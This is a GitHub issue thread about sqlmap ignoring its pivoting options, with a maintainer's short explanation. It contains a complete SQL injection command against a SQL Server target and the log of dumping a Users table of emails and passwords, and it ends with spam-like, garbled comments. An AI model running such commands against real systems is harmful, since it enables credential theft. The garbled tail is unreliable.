### ISSUE TITLE
sqlmap not using force-pivoting and pivot column | duplicates

### ISSUE THREAD

**Issue by shadowzoom** [sqlmapproject/sqlmap#4639]
Hi, Miroslav! First off, thanks for amazing product and all your work!
I have situation where sqlmap not using --force-pivoting and --pivot-column like there was no this comands. Main dbs is:
```

back-end DBMS: active fingerprint: Microsoft SQL Server 2017
banner:
---
Microsoft SQL Server 2017 (RTM-GDR) (KB4583456) - 14.0.2037.2 (X64)
        Nov  2 2020 19:19:59
        Copyright (C) 2017 Microsoft Corporation
        Standard Edition (64-bit) on Windows Server 2016 Datacenter 10.0 <X64> (Build 14393: ) (Hypervisor)
---

```
my request:
`
python sqlmap.py -r request.txt --force-ssl -v 1 --csv-del=; --output-dir test3 --level 3 --risk 2 --dbms=mssql --technique=U -D db -T Users -C ClientID,Email,UserID,UserName,Password --delay=1 --dump --force-pivoting --pivot-column=UserID --fresh-queries
`
output:
```

[09:08:19] [INFO] parsing HTTP request from 'request.txt'
[09:08:19] [WARNING] using 'D:\sqlmap\sqlmap-dev\test3' as the output directory
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]

Cookie parameter 'Token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]

[09:08:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 37 columns (custom)



[09:08:23] [INFO] testing Microsoft SQL Server
[09:08:24] [WARNING] reflective value(s) found and filtering out
[09:08:24] [INFO] confirming Microsoft SQL Server
[09:08:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2019 or 2016
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 10.0
back-end DBMS: Microsoft SQL Server 2017
[09:08:30] [INFO] fetching entries of column(s) 'ClientID,Email,Password,UserID,UserName' for table 'Users' in database 'db'
[09:08:35] [INFO] retrieved: ' ','user1@site.com','pass1','1393...
[09:08:37] [INFO] retrieved: '0','duplicate@website.com','duplicatepass'...
[09:08:38] [INFO] retrieved: '0','duplicate@website.com','duplicatepass'...
[09:08:40] [INFO] retrieved: '0','duplicate@website.com','duplicatepass'...

[09:08:41] [WARNING] user aborted during enumeration. sqlmap will display partial output
Database: db
Table: Users
[4 entries]
+----------+---------------------------+--------+---------------+---------------+
| ClientID | Email                     | UserID | UserName      | Password      |
+----------+---------------------------+--------+---------------+---------------+
| NULL     | user1@site.com            | 1393   | user1         | user1pass     |
| 0        | duplicate@website.com     | 6015   | duplicateuser | duplicatepass |
| 0        | duplicate@website.com     | 6015   | duplicateuser | duplicatepass |
| 0        | duplicate@website.com     | 6015   | duplicateuser | duplicatepass |
+----------+---------------------------+--------+---------------+---------------+


```
As you see sqlmap didn't even showed in output **using column=UserID as pivot column**

**Comment by stamparm** [comment]
Pivoting is used when the columns are retrieved one by one from the current row. In your situation, each row is retrieved in one request

**Comment by todlove** [comment]
> Hi, Miroslav! First off, thanks for amazing product and all your work!
> I have situation where sqlmap not using --force-pivoting and --pivot-column like there was no this comands. Main dbs is:
> 
> ```
> 
> back-end DBMS: active fingerprint: Microsoft SQL Server 2017
> banner:
> ---
> Microsoft SQL Server 2017 (RTM-GDR) (KB4583456) - 14.0.2037.2 (X64)
>         Nov  2 2020 19:19:59
>         Copyright (C) 2017 Microsoft Corporation
>         Standard Edition (64-bit) on Windows Server 2016 Datacenter 10.0 <X64> (Build 14393: ) (Hypervisor)
> ---
> ```
> 
> my request:
> `python sqlmap.py -r request.txt --force-ssl -v 1 --csv-del=; --output-dir test3 --level 3 --risk 2 --dbms=mssql --technique=U -D db -T Users -C ClientID,Email,UserID,UserName,Password --delay=1 --dump --force-pivoting --pivot-column=UserID --fresh-queries`
> output:
> 
> ```
> 
> [09:08:19] [INFO] parsing HTTP request from 'request.txt'
> [09:08:19] [WARNING] using 'D:\sqlmap\sqlmap-dev\test3' as the output directory
> custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
> 
> Cookie parameter 'Token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N]
> 
> [09:08:21] [INFO] testing connection to the target URL
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: #1* ((custom) POST)
>     Type: UNION query
>     Title: Generic UNION query (NULL) - 37 columns (custom)
> 
> 
> 
> [09:08:23] [INFO] testing Microsoft SQL Server
> [09:08:24] [WARNING] reflective value(s) found and filtering out
> [09:08:24] [INFO] confirming Microsoft SQL Server
> [09:08:30] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 10 or 2019 or 2016
> web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 10.0
> back-end DBMS: Microsoft SQL Server 2017
> [09:08:30] [INFO] fetching entries of column(s) 'ClientID,Email,Password,UserID,UserName' for table 'Users' in database 'db'
> [09:08:35] [INFO] retrieved: ' ','user1@site.com','pass1','1393...
> [09:08:37] [INFO] retrieved: '0','duplicate@website.com','duplicatepass'...
> [09:08:38] [INFO] retrieved: '0','duplicate@website.com','duplicatepass'...
> [09:08:40] [INFO] retrieved: '0','duplicate@website.com','duplicatepass'...
> 
> [09:08:41] [WARNING] user aborted during enumeration. sqlmap will display partial output
> Database: db
> Table: Users
> [4 entries]
> +----------+---------------------------+--------+---------------+---------------+
> | ClientID | Email                     | UserID | UserName      | Password      |
> +----------+---------------------------+--------+---------------+---------------+
> | NULL     | user1@site.com            | 1393   | user1         | user1pass     |
> | 0        | duplicate@website.com     | 6015   | duplicateuser | duplicatepass |
> | 0        | duplicate@website.com     | 6015   | duplicateuser | duplicatepass |
> | 0        | duplicate@website.com     | 6015   | duplicateuser | duplicatepass |
> +----------+---------------------------+--------+---------------+---------------+
> ```
> 
> As you see sqlmap didn't even showed in output **using column=UserID as pivot column**
http://github.com - automatic!
[GitHub](http://github.com)https://bash.im/quote/456244
Цитата #456244

**Comment by todlove** [comment]
sqlmap not using force-pivoting and pivot column | duplicates re-type
todlove@applovin.com
